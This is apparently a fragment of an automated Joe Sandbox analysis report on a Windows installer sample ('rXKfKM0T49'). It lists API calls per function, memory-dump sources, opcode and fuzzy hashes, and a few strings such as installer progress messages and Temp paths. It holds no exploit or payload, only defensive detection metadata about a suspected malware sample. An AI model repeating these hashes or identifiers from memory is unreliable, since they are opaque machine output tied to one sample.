                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-3250253040
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(0001E270,00000064,0001E311), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,700921EC,?,00000808), ref: 70091635
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,700921EC,?,00000808), ref: 7009163C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,700921EC,?,00000808), ref: 70091650
                                                                                                            • GetProcAddress.KERNEL32(!p,00000000), ref: 70091657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70091660
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID: !p
                                                                                                            • API String ID: 1148316912-2467817428
                                                                                                            • Opcode ID: c336faa0eb9174157cac95bf6f149daa4f13fbad6713519c00344bae21bfa333
                                                                                                            • Instruction ID: c05fac502b403bc556c4e336acb3a2462aefc3c2a2bfea3b9ac989a9b0749b23
                                                                                                            • Opcode Fuzzy Hash: c336faa0eb9174157cac95bf6f149daa4f13fbad6713519c00344bae21bfa333
                                                                                                            • Instruction Fuzzy Hash: 50F09E7311A1387F962116A78C4CD9B7E9CEF8B2F5B110216F728A11A085A15D01D7F1
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                              • Part of subcall function 7009121B: GlobalAlloc.KERNEL32(00000040,?,7009123B,?,700912DF,00000019,700911BE,-000000A0), ref: 70091225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70092657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 7009268C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 5e4fb459ac49a9313bf519d321793ca390f62ff4ba72b5b2a29739e38e06c971
                                                                                                            • Instruction ID: 62f66e45a8a62ca6c5db8efcbe496d3d784698f30e1c6efa9e3cabbaa3737027
                                                                                                            • Opcode Fuzzy Hash: 5e4fb459ac49a9313bf519d321793ca390f62ff4ba72b5b2a29739e38e06c971
                                                                                                            • Instruction Fuzzy Hash: 3D31F032224101DFD7269F65CC94D2E77BAFB85B34322012AF24293670C731A814EB59
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nspC239.tmp$C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll
                                                                                                            • API String ID: 3109718747-1808417934
                                                                                                            • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                            • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 48cab87c047df78743651730741a72010dbaf07530908430e1becba22478f77f
                                                                                                            • Instruction ID: e437b65b763aa35e47456aa5ef3ddcbd52917a2cf3b5700c3c4e47ab291d62f8
                                                                                                            • Opcode Fuzzy Hash: 48cab87c047df78743651730741a72010dbaf07530908430e1becba22478f77f
                                                                                                            • Instruction Fuzzy Hash: 4651F532F76055AECB129FA4C8805ED77FBEB44B30B10425AE406A3354D770AE81B79E
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700924D6
                                                                                                              • Part of subcall function 7009122C: lstrcpynW.KERNEL32(00000000,?,700912DF,00000019,700911BE,-000000A0), ref: 7009123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 7009245C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70092477
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 4216380887-0
                                                                                                            • Opcode ID: 7023aa4b27ef49ea52296a6cd5e5d0cc00dd98e5ca7be6d16937fea4ba5435e0
                                                                                                            • Instruction ID: be975426a80bbd8ba3e1072c43150a1c9d9c0c7e0ea22cd262cf47fad4984042
                                                                                                            • Opcode Fuzzy Hash: 7023aa4b27ef49ea52296a6cd5e5d0cc00dd98e5ca7be6d16937fea4ba5435e0
                                                                                                            • Instruction Fuzzy Hash: CE41E1B1128305DFD320DF31D844A6E77F9FB88B30B22891EF14687691EB74A544EB69
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
